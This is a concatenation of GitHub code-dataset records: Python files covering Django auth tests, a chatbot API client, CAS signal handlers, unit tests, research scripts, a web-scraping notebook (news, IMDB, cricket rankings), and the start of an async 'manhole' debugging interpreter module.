test_still_throws_an_exception_on_unanticipated_exceptions(self):\n request = mox.MockObject(HttpRequest)\n request.method = 'GET'\n request.GET = {}\n request.POST = {}\n request.facebook = Facebook('foo', 'bar', 'baz')\n\n def mock_validate_signature(*args, **kwargs):\n ret = self.validate_signature_return()\n ret['expires'] = 'some-random-number-%d' % random(100, 200)\n return ret\n request.facebook.validate_signature = mock_validate_signature\n replay_all(request)\n\n auth = FacebookConnectBackend()\n self.assertRaises(ValueError, auth.authenticate, request=request)\n\n","repo_name":"domain51/d51.django.auth","sub_path":"d51/django/auth/facebook/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"12630898671","text":"import requests\n\nAPI_ENDPOINT = \"https://waynecool.ngrok.app/api/chat\"\nAPI_KEY = \"YOUR_SECRET_API_KEY\"\n\ndef send_message_to_chatbot(message):\n headers = {\n \"Authorization\": f\"Bearer {API_KEY}\",\n \"Content-Type\": \"application/json\"\n }\n data = {\"message\": message}\n \n response = requests.post(API_ENDPOINT, json=data, headers=headers)\n \n if response.status_code == 200:\n return response.json()[\"response\"]\n else:\n return f\"Error: {response.text}\"\n\nif __name__ == \"__main__\":\n while True:\n user_input = input(\"You: \")\n if user_input.lower() in [\"quit\", \"exit\"]:\n break\n response = send_message_to_chatbot(user_input)\n print(f\"Bot: {response}\")\n","repo_name":"LogicPy/Python","sub_path":"AI Projects/.ai website foundation template/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6309460535","text":"import json\n\nfrom django.dispatch import receiver\nfrom django_cas_ng.signals import cas_user_authenticated, cas_user_logout\n\n\n@receiver(cas_user_authenticated)\ndef cas_user_authenticated_callback(sender, **kwargs):\n args = {}\n args.update(kwargs)\n print('''cas_user_authenticated_callback:\n user: %s\n created: %s\n attributes: %s\n ''' % (\n args.get('user'),\n args.get('created'),\n json.dumps(args.get('attributes'), sort_keys=True, indent=2)))\n\n\n@receiver(cas_user_logout)\ndef cas_user_logout_callback(sender, **kwargs):\n args = {}\n args.update(kwargs)\n print('''cas_user_logout_callback:\n user: %s\n session: %s\n ticket: %s\n ''' % (\n args.get('user'),\n args.get('session'),\n args.get('ticket')))\n","repo_name":"django-cas-ng/example","sub_path":"mysite/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26459177070","text":"#!/usr/bin/python3\n\"\"\"\nThis model contains a unit test class for the BaseModel class\n\"\"\"\nimport unittest\nimport pycodestyle\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom datetime import datetime\n\n\nclass TestBaseClass(unittest.TestCase):\n \"\"\"\n BaseModel test class\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Initializes BaseModel instances\n \"\"\"\n self.bm1 = BaseModel()\n self.bm2 = BaseModel()\n\n def test_pep8_compliance(self):\n \"\"\"\n Tests compliance of the class with pep8\n \"\"\"\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['models/base_model.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")\n\n def test_save(self):\n \"\"\"\n Tests save method works as expected\n \"\"\"\n self.before_save = self.bm1.updated_at\n self.bm1.save()\n self.assertNotEqual(self.bm1.updated_at, self.before_save)\n\n def test_to_dict(self):\n \"\"\"\n Test to_dict method works as expected\n \"\"\"\n self.bm1_dict = dict(self.bm1.__dict__)\n self.bm1_dict['__class__'] = \"BaseModel\"\n self.bm1_dict['created_at'] = self.bm1_dict['created_at'].isoformat()\n self.bm1_dict['updated_at'] = self.bm1_dict['updated_at'].isoformat()\n\n self.assertDictEqual(self.bm1_dict, self.bm1.to_dict())\n\n def test_create_from_dict(self):\n \"\"\"\n Tests that BaseModel creates an instance from kwargs\n and that the created instance is not the same as previous instance\n from which the kwargs were created from\n \"\"\"\n self.bm = BaseModel()\n self.bm1_json = self.bm1.to_dict()\n self.bm_from_dict = BaseModel(**self.bm1_json)\n self.assertNotEqual(self.bm, self.bm_from_dict)\n\n def test_uuid_type(self):\n \"\"\"\n Tests that the id assigned to the instance is of type string\n \"\"\"\n self.assertEqual(str, type(self.bm1.id))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smithjilks/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15627028645","text":"from __future__ import print_function\nimport csv\nimport os\nimport random\n\nnumBlocksPerType = 4\n\nallFaces = [img for img in os.listdir('../valence_img/faces') if img.endswith('jpg')]\nambFaces = [img for img in allFaces if ('SP' in img or 'SU' in img)]\nhapFaces = [img for img in allFaces if 'HA' in img]\nangFaces = [img for img in allFaces if 'AN' in img]\n\nallScenes = [img for img in os.listdir('../valence_img/scenes') if img.endswith('jpg')]\nambScenes = [img for img in allScenes if img.startswith('A')]\nposScenes = [img for img in allScenes if img.startswith('P')]\nnegScenes = [img for img in allScenes if img.startswith('N')]\n\nfaceSeqs, sceneSeqs = [], []\n\nwith open('stim.csv', 'r') as stimFile:\n reader = csv.reader(stimFile, delimiter=',')\n counter = 2 * numBlocksPerType\n for row in reader:\n if counter % 2 == 0:\n if counter <= numBlocksPerType:\n ambStim, posStim, negStim, stimSeqs = list(ambFaces), list(hapFaces), list(angFaces), faceSeqs\n else:\n ambStim, posStim, negStim, stimSeqs = list(ambScenes), list(posScenes), list(negScenes), sceneSeqs\n random.shuffle(ambStim)\n random.shuffle(posStim)\n random.shuffle(negStim)\n stimSeq = []\n for stimType in row:\n if stimType == '2':\n stimSeq.append(ambStim.pop())\n elif stimType == '1':\n stimSeq.append(posStim.pop())\n elif stimType == '0':\n stimSeq.append(negStim.pop())\n stimSeqs.append(stimSeq)\n counter -= 1\n if counter == 0:\n break\nprint(faceSeqs)\nprint(sceneSeqs)\nwith open('stimuli.csv', 'w') as outfile:\n writer = csv.writer(outfile)\n for seq in faceSeqs:\n writer.writerow(seq)\n for seq in sceneSeqs:\n writer.writerow(seq)\n","repo_name":"CSNLab/valence-bias","sub_path":"psychopy/stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1018878733","text":"with open(\"repos.csv\", \"r\") as table:\n r = 0\n w = 0\n s = 0\n f = 0\n for line in table:\n tok = line.split(\",\")\n if tok[0] == \"name\":\n continue\n name = tok[0]\n weight = 2 * int(tok[1]) + 3 * int(tok[2]) + 4 * int(tok[3])\n\n # output weight table\n print(\"{},{}\".format(name, weight))\n w += int(tok[1])\n s += int(tok[2])\n f += int(tok[3])\n r += 1\n # output statistical summary\n # print(\"{} repos, total watch {}, total star {}, total fork {}\".format(r, w, s, f))\n","repo_name":"Alan052918/Package-Dependency-Scaling-Analysis","sub_path":"repo-sampling/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42814705411","text":"import numpy as np\nimport chopper_context as cctx\nimport neutron_context as nctx\nimport matplotlib.pyplot as plt\n\n# Calculates the resolution limit of the chopper system for removing the frame overlaps and due to mechanical stability\n# of the choppers\n\nplt.rcParams.update({'font.size': 20})\n\nwavelengths = np.linspace(cctx.wavelength_min, cctx.wavelength_max, num=100)\nwavenumbers = nctx.wavelength2wavenumber(wavelengths)\n\nu_rt = cctx.limit_frame_overlap(wavenumbers, cctx.distance12, cctx.distance1s, np.deg2rad(12), np.deg2rad(9), 5, 1,\n cctx.tau_max, cctx.tau_min)\nu_rt_f = cctx.limit_mechanical(wavenumbers, np.deg2rad(12), 10e3 / 60.0, cctx.distance1s)\n\nfig, ax = plt.subplots(figsize=(10, 6))\n# ax.plot(wavelengths * 1e10, u_rt * 100)\nax.plot(wavelengths * 1e10, u_rt * 100, label=\"Frame-overlap limit\")\nax.plot(wavelengths * 1e10, u_rt_f * 100, label=\"Mechanical limit\")\nax.legend()\nax.set_xlabel(r\"Wavelength ($\\mathrm{\\AA}$)\")\nax.set_ylabel(r\"Smallest achievable $\\frac{\\Delta t}{t} * 100\\%$\")\nax.tick_params(axis=\"both\", top=True, right=True, direction=\"in\")\nfig.savefig(\"Resolution\\\\ChopperResolution_Limit.png\", bbox_inches='tight')\nplt.close(fig)\n","repo_name":"rtang-sidney/Mushroom","sub_path":"chopper_resol_limit.py","file_name":"chopper_resol_limit.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7683469405","text":"import cv2\r\nimport numpy as np\r\n\r\nfrom registry import Registries\r\n\r\nfrom .base_scorer import BaseScorer\r\n\r\n\r\n@Registries.scorer.register(\"uniform\")\r\nclass UniformScorer(BaseScorer):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def score_frame(self,\r\n group_size: int = 1,\r\n resize_shape: tuple = (64, 64),\r\n sort: bool = True,\r\n unitized: bool = True) -> list:\r\n assert self.scores is not None and self.scores == [], \"please call reset first\"\r\n assert group_size > 1, f\"the group size for {self.__class__.__name__} should be greater than 1\"\r\n\r\n frame_count = len(self.frames)\r\n for idx in range(frame_count):\r\n if idx % group_size == 0:\r\n data = {\"index\": idx,\r\n \"score\": 1}\r\n else:\r\n data = {\"index\": idx,\r\n \"score\": 0}\r\n self.scores.append(data)\r\n\r\n if sort:\r\n self.scores = self._sort_score(self.scores)\r\n if unitized:\r\n self.scores = self._unitize(self.scores)\r\n return self.scores\r\n","repo_name":"JasonZuu/Frame-Selection","sub_path":"scorer/uniform_scorer.py","file_name":"uniform_scorer.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15843560192","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # WEB SCRAPING ASSIGNMENT-1\n\n# Write a python program to scrape mentioned details from dineout.co.in and make data frame\n\n# In[1]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[2]:\n\n\npage= requests.get(\"https://www.dineout.co.in/delhi-restaurants/buffet-special\")\npage\n\n\n# In[3]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[4]:\n\n\nRestaurantname =[]\n\n\n# In[5]:\n\n\nfor i in soup.find_all(\"a\",class_=\"restnt-name ellipsis\"):\n Restaurantname.append(i.text)\n \nRestaurantname\n\n\n# In[6]:\n\n\nCuisine=[]\n\n\n# In[7]:\n\n\nfor i in soup.find_all(\"span\",class_=\"double-line-ellipsis\"):\n Cuisine.append(i.text.split('|')[1])\n \nCuisine\n\n\n# In[8]:\n\n\nLocation=[]\n\n\n# In[9]:\n\n\nfor i in soup.find_all(\"div\",class_=\"restnt-loc ellipsis\"):\n Location.append(i.text)\n \nLocation\n\n\n# In[10]:\n\n\nRatings=[]\n\n\n# In[11]:\n\n\nfor i in soup.find_all(\"div\",class_=\"restnt-rating rating-4\"):\n Ratings.append(i.text)\n \nRatings\n\n\n# In[12]:\n\n\nImages=[]\n\n\n# In[13]:\n\n\nfor i in soup.find_all(\"img\",class_=\"no-img\"):\n Images.append(i.get(\"data-src\"))\n\nImages\n\n\n# In[14]:\n\n\nimport pandas as pd\ndf = pd.DataFrame({'Restaurantname':Restaurantname,'Cuisine':Cuisine,'Location':Location,'Ratings':Ratings,'Images_URL':Images})\n\n\n# In[15]:\n\n\ndf\n\n\n# \n# \n# \n# Write a python program to scrape mentioned news details from https://www.cnbc.com/world/?region=world and make data frame\n# \n\n# In[16]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[17]:\n\n\npage=requests.get('https://www.cnbc.com/world/?region=world')\n\npage\n\n\n# In[18]:\n\n\nnews=BeautifulSoup(page.content)\n\nnews\n\n\n# In[19]:\n\n\nHeadline=[]\nfor i in news.find_all('a',class_='LatestNews-headline'):\n Headline.append(i.text)\nHeadline\n\n\n# In[20]:\n\n\nTime=[]\n\n\n# In[21]:\n\n\nfor i in news.find_all(\"time\",class_=\"LatestNews-timestamp\"):\n Time.append(i.text)\n\nTime\n\n\n# In[22]:\n\n\nurl = \"https://www.cnbc.com/world/?region=world\"\nwebpage = requests.get(url) \ntrav = BeautifulSoup(webpage.content, \"html.parser\")\nfor link in trav.find_all('a'):\n print(type(link), \" \", link)\n\n\n# In[23]:\n\n\ntrav.text\n\n\n# In[25]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"News\":Headline,\"Time\":Time,})\ndf\n\n\n# \n# Write a python program to scrape the details of most downloaded articles from AI in last 90 days\n\n# In[26]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[27]:\n\n\npage= requests.get(\"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\")\npage\n\n\n# In[28]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[29]:\n\n\ntitles=[]\n\nfor i in soup.find_all(\"h2\",class_=\"sc-1qrq3sd-1 gRGSUS sc-1nmom32-0 sc-1nmom32-1 btcbYu goSKRg\"):\n titles.append(i.text)\n\ntitles\n\n\n# In[30]:\n\n\nAuthor=[]\n\nfor i in soup.find_all(\"span\",class_=\"sc-1w3fpd7-0 dnCnAO\"):\n Author.append(i.text)\n\nAuthor\n\n\n# In[31]:\n\n\nDate=[]\n\nfor i in soup.find_all(\"span\",class_=\"sc-1thf9ly-2 dvggWt\"):\n Date.append(i.text)\n\nDate\n\n\n# In[35]:\n\n\nurl = \"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\"\nwebpage = requests.get(url) \ntrav = BeautifulSoup(webpage.content, \"html.parser\")\nfor link in trav.find_all('a'):\n print(type(link), \" \", link)\n\n\n# In[37]:\n\n\ntrav.text \n\n\n# In[38]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Title\":titles,\"Author\":Author,\"Published Date\":Date,\"url\":\"https://www.journals.elsevier.com/artificial-intelligence/most-downloaded-articles\"})\ndf\n\n\n# Write s python program to display list of respected former presidents of India(i.e. Name , Term of office) from https://presidentofindia.nic.in/former-presidents.htm and make data frame. \n\n# In[39]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[40]:\n\n\npage= requests.get(\"https://presidentofindia.nic.in/former-presidents.htm\")\npage\n\n\n# In[41]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[42]:\n\n\nName=[]\nfor i in soup.find_all('h3'):\n Name.append(i.text)\n\nName\n\n\n# In[43]:\n\n\nTerm=[]\nfor i in soup.find_all('p'):\n Term.append(i.text)\n \nTerm\n\n\n# In[44]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"PresidentiaL List\":Name})\ndf\n\n\n# \n# Write a python program to display IMDB’s Top rated 50 movies’ data (i.e. name, rating, year of release) and make data frame\n\n# In[45]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[46]:\n\n\npage= requests.get(\"https://www.imdb.com/search/title/?groups=top_100\") \npage\n\n\n# In[47]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[48]:\n\n\ndef get_movie_titles(soup):\n \n selection_class=\"lister-item-header\"\n movie_title_tags=soup.find_all('h3',{'class':selection_class})\n movie_titles=[]\n\n for tag in movie_title_tags:\n title = tag.find('a').text\n movie_titles.append(title)\n \n \n return movie_titles\n\n\n# In[49]:\n\n\ntitles = get_movie_titles(soup)\ntitles\n\n\n# In[50]:\n\n\nRatings=[]\ndef get_movie_rating(soup):\n rating_selector=\"inline-block ratings-imdb-rating\" \n movie_rating_tags=soup.find_all('div',{'class':rating_selector})\n movie_rating_tagss=[] \n for tag in movie_rating_tags:\n movie_rating_tagss.append(tag.get_text().strip())\n return movie_rating_tagss\n\n\n# In[51]:\n\n\nRatings = get_movie_rating(soup)\nRatings\n\n\n# In[52]:\n\n\nyear=[]\nfor i in soup.find_all(\"span\",class_=\"lister-item-year text-muted unbold\"):\n year.append(i.text)\n\nyear\n\n\n# In[53]:\n\n\nimport pandas as pd\ndf = pd.DataFrame({'Name':titles,'ratings':Ratings,'year':year})\ndf\n\n\n# Write a python program to display IMDB’s Top rated 50 Indian movies’ data (i.e. name, rating, year of release) and make data frame.\n\n# In[54]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[55]:\n\n\npage= requests.get(\"https://www.imdb.com/list/ls079077479/\") \npage\n\n\n# In[56]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[58]:\n\n\ndef get_movie_name(soup):\n \n selection_class=\"lister-item-header\"\n movie_name_tags=soup.find_all('h3',{'class':selection_class})\n movie_name=[]\n\n for tag in movie_name_tags:\n title = tag.find('a').text\n movie_name.append(title)\n \n \n return movie_name\n\n\n# In[59]:\n\n\nname = get_movie_name(soup)\nname[:50]\n\n\n# In[60]:\n\n\ndef get_movie_rating(soup):\n rating_selector=\"ipl-rating-widget\" \n movie_rating_tags=soup.find_all('div',{'class':\"ipl-rating-star small\"})\n movie_rating_tagss=[]\n for tag in movie_rating_tags:\n movie_rating_tagss.append(tag.get_text().strip())\n return movie_rating_tagss\n\n\n# In[61]:\n\n\nratings = get_movie_rating(soup)\nratings[:50]\n\n\n# In[62]:\n\n\ndef get_movie_year(soup):\n year_selector = \"lister-item-year text-muted unbold\" \n movie_year_tags=soup.find_all('span',{'class':year_selector})\n movie_year_tagss=[]\n for tag in movie_year_tags:\n movie_year_tagss.append(tag.get_text().strip()[1:5])\n return movie_year_tagss\n\n\n# In[63]:\n\n\nyears = get_movie_year(soup)\nyears[:50]\n\n\n# In[64]:\n\n\nimport pandas as pd \ndf = pd.DataFrame({'Name':name,'ratings':ratings,'year':years})\ndf.head(50)\n\n\n# Top 10 ODI teams in women’s cricket along with the records for matches, points and rating.\n\n# In[65]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[66]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/team-rankings/odi')\npage\n\n\n# In[67]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[71]:\n\n\nTeam=[]\n\n\n# In[72]:\n\n\nfor i in soup.find_all('span',class_='u-hide-phablet'):\n Team.append(i.text)\nTeam\n\n\n# In[73]:\n\n\nmatch=[]\n\n\n# In[74]:\n\n\nfor i in soup.find_all('td',class_='table-body__cell u-center-text'):\n match.append(i.text)\nmatch\n\n\n# In[75]:\n\n\nrating=[]\nfor i in soup.find_all('td',class_=\"table-body__cell u-text-right rating\"):\n rating.append(i.text)\nrating\n\n\n# Top 10 women’s ODI Batting players along with the records of their team and rating\n\n# In[76]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[77]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/player-rankings/odi/batting')\npage\n\n\n# In[78]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[80]:\n\n\nplayer_name=[]\n\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\n\nplayer_name\n\n\n# In[81]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[82]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[84]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# \n# Top 10 women’s ODI all-rounder along with the records of their team and rating\n\n# In[85]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[86]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/womens/player-rankings/odi/all-rounder')\npage\n\n\n# In[87]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[88]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\nplayer_name\n\n\n# In[89]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[90]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[91]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# \n# Top 10 ODI teams in men’s cricket along with the records for matches, points and rating\n\n# In[93]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[94]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/team-rankings/odi')\npage\n\n\n# In[95]:\n\n\npage=BeautifulSoup(page.content)\npage\n\n\n# In[96]:\n\n\ncountry=[]\nfor i in page.find_all('span',class_='u-hide-phablet'):\n country.append(i.text)\n\ncountry\n\n\n# In[97]:\n\n\nmatch=[]\nfor i in page.find_all('td',class_='table-body__cell u-center-text'):\n match.append(i.text)\nmatch\n\n\n# In[98]:\n\n\nrating=[]\nfor i in page.find_all('td',class_='table-body__cell u-text-right rating'):\n rating.append(i.text)\nrating\n\n\n# \n# Top 10 ODI Batsmen along with the records of their team and rating\n\n# In[99]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[100]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/player-rankings/odi/batting')\npage\n\n\n# In[101]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[102]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\nplayer_name\n\n\n# In[103]:\n\n\nTeam=[]\nfor i in soup.find_all(\"span\",class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[104]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\nRating\n\n\n# In[105]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Team\": Team, \"Rating\":Rating, \"player_name\":player_name})\ndf.head(10)\n\n\n# Top 10 ODI bowlers along with the records of their team and rating.\n\n# In[106]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# In[107]:\n\n\npage=requests.get('https://www.icc-cricket.com/rankings/mens/player-rankings/odi/bowling')\npage\n\n\n# In[108]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[109]:\n\n\nplayer_name=[]\nfor i in soup.find_all('td',class_='table-body__cell rankings-table__name name'):\n player_name.append(i.text)\nplayer_name\n\n\n# In[110]:\n\n\nTeam=[]\nfor i in soup.find_all('span',class_='table-body__logo-text'):\n Team.append(i.text)\nTeam\n\n\n# In[111]:\n\n\nRating=[]\nfor i in soup.find_all('td',class_='table-body__cell rating'):\n Rating.append(i.text)\n\nRating\n\n\n# In[113]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"Player Name\":player_name, \"Team\": Team, \"Rating\":Rating})\ndf.head(10)\n\n\n# Write a python program to display all the header tags from wikipedia.org and make data frame. \n\n# In[116]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\n# In[117]:\n\n\npage= requests.get(\"https://en.wikipedia.org/wiki/Main_Page\")\npage\n\n\n# In[118]:\n\n\nsoup=BeautifulSoup(page.content)\nsoup\n\n\n# In[119]:\n\n\ntitles = soup.find_all(['h1', 'h2','h3','h4','h5','h6'])\n\n\n# In[120]:\n\n\ntitles\n\n\n# In[121]:\n\n\nprint('List all the header tags :', *titles, sep='\\n\\n')\n\n\n# In[122]:\n\n\nimport pandas as pd\ndf=pd.DataFrame({\"List\":titles})\ndf\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"chhetrishivangi/Internship","sub_path":"Untitled1.py","file_name":"Untitled1.py","file_ext":"py","file_size_in_byte":12099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3688278646","text":"from typing import Any, Tuple, Optional, Dict, Union, List, Set, Callable, Type\nfrom socket import SOL_SOCKET, SO_PEERCRED\nfrom abc import ABC, abstractmethod\nfrom io import BytesIO, StringIO\nfrom types import CodeType\nimport contextlib\nimport functools\nimport traceback\nimport logging\nimport asyncio\nimport struct\nimport codeop\nimport pwd\nimport ast\nimport sys\nimport os\n\nlog = logging.getLogger(\"mau.manhole\")\n\n\nclass AwaitTransformer(ast.NodeTransformer):\n def visit_Call(self, node: ast.Call) -> Union[ast.Call, ast.Await]:\n if ((not isinstance(node.func, ast.Name) or node.func.id != AWAIT_FUNC_NAME\n or len(node.args) != 1 or len(node.keywords) != 0)):\n return node\n return ast.copy_location(ast.Await(value=node.args[0]), node)\n\n\nclass AwaitFallback:\n def __str__(self) -> str:\n return \"magical await() AST transformer\"\n\n def __repr__(self) -> str:\n return \"magical await() AST transformer\"\n\n def __call__(self, *args, **kwargs) -> Any:\n if len(args) != 1:\n raise TypeError(f\"{AWAIT_FUNC_NAME}() takes 1 positional argument \"\n f\"but {len(args)} were given\")\n elif len(kwargs) > 0:\n raise TypeError(f\"{AWAIT_FUNC_NAME}() got an unexpected keyword argument \"\n f\"'{list(kwargs.keys())[0]}'\")\n raise RuntimeError(\"AST transforming appears to have failed\")\n\n\n# Python 3.6 doesn't even support parsing top-level awaits, so we use an AST transformer to\n# convert `await(coro)` into `await coro`.\n# Python 3.7 and up allow parsing top-level awaits and only throw errors if you try to execute them.\nAWAIT_TRANSFORM = sys.version_info < (3, 7)\nAWAIT_FUNC_NAME = \"await\"\nAWAIT_FALLBACK = AwaitFallback()\n\nASYNC_EVAL_WRAPPER: str = \"\"\"\nasync def __eval_async_expr():\n try:\n pass\n finally:\n globals().update(locals())\n\"\"\"\n\n\ndef asyncify(tree: ast.AST, wrapper: str = ASYNC_EVAL_WRAPPER, module: str = \"\") -> CodeType:\n # TODO in python 3.8+, switch to ast.PyCF_ALLOW_TOP_LEVEL_AWAIT\n if AWAIT_TRANSFORM:\n AwaitTransformer().visit(tree)\n insert_returns(tree.body)\n wrapper_node: ast.AST = ast.parse(wrapper, \"\", \"single\")\n method_stmt = wrapper_node.body[0]\n try_stmt = method_stmt.body[0]\n try_stmt.body = tree.body\n return compile(wrapper_node, module, \"single\")\n\n\n# From https://gist.github.com/nitros12/2c3c265813121492655bc95aa54da6b9\ndef insert_returns(body: List[ast.AST]) -> None:\n if isinstance(body[-1], ast.Expr):\n body[-1] = ast.Return(body[-1].value)\n ast.fix_missing_locations(body[-1])\n elif isinstance(body[-1], ast.If):\n insert_returns(body[-1].body)\n insert_returns(body[-1].orelse)\n elif isinstance(body[-1], (ast.With, ast.AsyncWith)):\n insert_returns(body[-1].body)\n\n\nclass StatefulCommandCompiler(codeop.CommandCompiler):\n \"\"\"A command compiler that buffers input until a full command is available.\"\"\"\n\n buf: BytesIO\n wrapper: str = ASYNC_EVAL_WRAPPER\n\n def __init__(self) -> None:\n super().__init__()\n self.compiler = functools.partial(compile, optimize=1,\n flags=ast.PyCF_ONLY_AST | codeop.PyCF_DONT_IMPLY_DEDENT)\n self.buf = BytesIO()\n\n def is_partial_command(self) -> bool:\n return bool(self.buf.getvalue())\n\n def __call__(self, source: bytes, **kwargs: Any) -> Optional[CodeType]:\n buf = self.buf\n if self.is_partial_command():\n buf.write(b\"\\n\")\n buf.write(source)\n\n code = self.buf.getvalue().decode(\"utf-8\")\n codeobj = super().__call__(code, **kwargs)\n\n if codeobj:\n self.reset()\n return asyncify(codeobj, wrapper=self.wrapper)\n return None\n\n def reset(self) -> None:\n self.buf.seek(0)\n self.buf.truncate(0)\n\n\nclass Interpreter(ABC):\n @abstractmethod\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n loop: asyncio.AbstractEventLoop) -> None:\n pass\n\n @abstractmethod\n def close(self) -> None:\n pass\n\n @abstractmethod\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n pass\n\n\nclass AsyncInterpreter(Interpreter):\n \"\"\"An interactive asynchronous interpreter.\"\"\"\n\n reader: asyncio.StreamReader\n writer: asyncio.StreamWriter\n namespace: Dict[str, Any]\n banner: bytes\n compiler: StatefulCommandCompiler\n loop: asyncio.AbstractEventLoop\n running: bool\n\n def __init__(self, namespace: Dict[str, Any], banner: Union[bytes, str],\n loop: asyncio.AbstractEventLoop) -> None:\n super().__init__(namespace, banner, loop)\n self.namespace = namespace\n self.banner = banner if isinstance(banner, bytes) else str(banner).encode(\"utf-8\")\n self.compiler = StatefulCommandCompiler()\n self.loop = loop\n\n async def send_exception(self) -> None:\n \"\"\"When an exception has occurred, write the traceback to the user.\"\"\"\n self.compiler.reset()\n\n exc = traceback.format_exc()\n self.writer.write(exc.encode(\"utf-8\"))\n\n await self.writer.drain()\n\n async def execute(self, codeobj: CodeType) -> Tuple[Any, str]:\n exec(codeobj, self.namespace)\n with contextlib.redirect_stdout(StringIO()) as buf:\n value = await eval(\"__eval_async_expr()\", self.namespace)\n\n return value, buf.getvalue()\n\n async def handle_one_command(self) -> None:\n \"\"\"Process a single command. May have many lines.\"\"\"\n\n while True:\n await self.write_prompt()\n codeobj = await self.read_command()\n\n if codeobj is not None:\n await self.run_command(codeobj)\n return\n\n async def run_command(self, codeobj: CodeType) -> None:\n \"\"\"Execute a compiled code object, and write the output back to the client.\"\"\"\n try:\n value, stdout 